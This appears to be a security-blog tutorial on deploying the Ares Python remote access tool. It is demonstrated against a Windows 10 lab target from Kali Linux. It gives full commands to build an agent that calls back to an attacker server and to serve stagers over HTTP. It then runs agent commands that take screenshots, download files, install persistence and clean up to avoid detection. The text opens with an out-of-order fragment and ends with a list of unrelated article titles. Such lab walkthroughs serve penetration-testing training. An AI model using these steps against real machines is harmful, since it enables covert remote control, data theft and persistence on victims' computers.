Now we have to send the files to the target. For this we will open a new terminal and traverse inside the stagers directory. Here as we can see that we have multiple stagers. Let’s try to open the batch file, here we see that the PowerShell batch file in encrypted. Now we will sent these stagers to the target using the python server.

cd stagers/

python -m SimpleHTTPServer 80

Command Execution

After the stager is executed, we are provided with a prompt to run commands. Here we run the command systeminfo. And we have the system information of the target as shown in the given image.

systeminfo

In this article, we will learn how to use Ares tool. This tool performs the Command and Control over the Web Interface. This tool can be found on GitHub.

Table of Content:

Introduction
Installation
Exploiting Target
Command Execution
Capturing Screenshot
File Download
Compressing Files
Persistence Agent
Clean Up

Introduction

Ares is a Python Remote Access Tool. Ares is made of two main programs: A Command & Control server, which is a Web interface to administer the agents and an agent program, which runs on the compromised host, and ensures communication with the CNC. The credit for creating this tool goes to Kevin Locati.

For this particular demonstration,

Attacker: Kali Linux

Target: Windows 10

Installation

To begin first, we need the tool on our Attacker Machine. To do this, we will clone the tool directly from the GitHub. After Cloning, we traversed into the newly created directory called Ares through the cd command as shown in the image.

git clone https://github.com/sweetsoftware/Ares.git

cd Ares

Now, to make the tool work we will be needing to install some prerequisites. Let’s start from the file that we cloned earlier name requirements.txt. This file contains the details of the python libraries that are required to be installed.

pip install -r requirements.txt

Now as we have our target a Windows Machine, we will need to compile the agent that is compatible with the Windows Machine. To do that we will be needing wine. So, using the file that we cloned earlier, let’s begin the wine installation. Now this will take a bit of time.

./wine_setup.sh

Exploiting Target

Now that we have successfully installed all the requirements needed to run the Ares tool. Its time to gain the Command and Control Session. To do this we are going to need an agent. For this, we use the cd command to traverse into the agent directory. After that, we list the contents of the file to find a config file. We will be needing to edit the file so as to gain the session.

cd agent/

nano config.py

As we can see, when we open the config file using the nano command. We see that the SERVER variable has an IP Address. We are going to edit it and change it to the internal IP address of the attacker machine, which in my case is 192.168.1.4. We don’t require any further changes. So Save and Exit the nano editor.

Now that we have configured the config file, Its time to create an agent. As we have a Windows Machine as a target. We will be creating a windows agent using the command given below.

./builder.py -p Windows –server http://192.168.1.4:8080 -o agent.exe

Now, we will send this agent to the target machine by any means of preference. After that, we will be needing to launch the server. This is required as the agent will communicate to this server. Let’s get back to the Ares directory. Here we have a sub-directory called server. After traversing in it we will have to initiate the database for that we will be using the initdb parameter. Initiating the database is to be done only the first time. Now we will run the server as shown in the given image.

cd server/

./ares.py initdb

./ares.py runserver -h 0.0.0.0 -p 8080 --threaded

Now we will open the server IP in our browser. Here we will see a form asking for the password as shown in the given image. We entered the password and clicked on Define to continue.

Now that the password is defined, we will have to enter the password to log in.

Here we have the main index of the Ares GUI. It has the following links: Change Password, Disconnect, Agent List. Now, we will go back to the step where we created an agent. Only after we execute the agent on the target machine, we will get a line Agent in Agent List.

As we can see the image given below, that we have an agent alive. We have the name of the agent, status, user that was logged in when the agent went live, we have the hostname too. We are also informed about the IP Address and Operating System of the target. Here we could run the agent on multiple devices each one of them will be visible here. We can select sessions from here and execute the same command on multiple session at the same time. We will have to click on the name to proceed.

Command Execution

As Ares runs the PowerShell commands, let’s start with the System Information command. As we can see that we have all the system config information of the target machine.

systeminfo

Capturing Screenshot

Now, Let’s take a screenshot of the target machine. To do this we will type in the screenshot command and the agent will capture the screenshot and provide a link as shown in the figure. On opening this link the screenshot can be viewed.

screenshot

File Download

We can also download files from the remote target using this agent. To do this we require the name of the file. This can be obtained using the dir command. Now once we have the filename, we will download it to our local attacker machine as shown in the image given below.

download file.txt

Compressing Files

We can compress a directory on the remote target using the Ares agent. For this, we require the name of the directory. After we extract the name of the directory, we can compress the file remotely using the command given below. Here, we have ‘sample’ the name of the directory and ‘compressed.zip’ the name of the compressed file.

zip compressed.zip sample

Persistence Agent

We could invoke the persistence in the agent using the command persist. This command installs the agent on the remote target.

persist

Clean Up

This tool also performs the clean up after the work through the session Is done. This command removes the agent from the target machine. Hence it goes on undetectable.

clean

Web Developer: 1: Vulnhub Lab Walkthrough

Multiple Ways to Exploiting OSX using PowerShell Empire

Command & Control Tool: Pupy

Hack the Box Carrier: Walkthrough

OSX Exploitation with Powershell Empire

Command & Control: Silenttrinity Post-Exploitation Agent

Empire GUI: Graphical Interface to the Empire Post-Exploitation Framework

Hack the Box Frolic: Walkthrough

Threat Detection for your Network using Kfsensor Honeypot

Comprehensive Guide on Netcat

dnscat2: Command and Control over the DNS

Hack the Box Curling: Walkthrough

Kage: Graphical User Interface for Metasploit

Beginner’s Guide to Nessus

OverTheWire -– Natas Walkthrough (1-10)

Command and Control with to DropboxC2

Hack the Box Vault: Walkthrough

Hack the Box Vault: Walkthrough

Level: Intermediate

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore, they have a static IP. The IP of Curling is 10.10.10.109

Penetrating Methodology

Walkthrough

Command and Control Guide to WebSocket C2

Command & Control: WebDav C2

Command & Control: Ares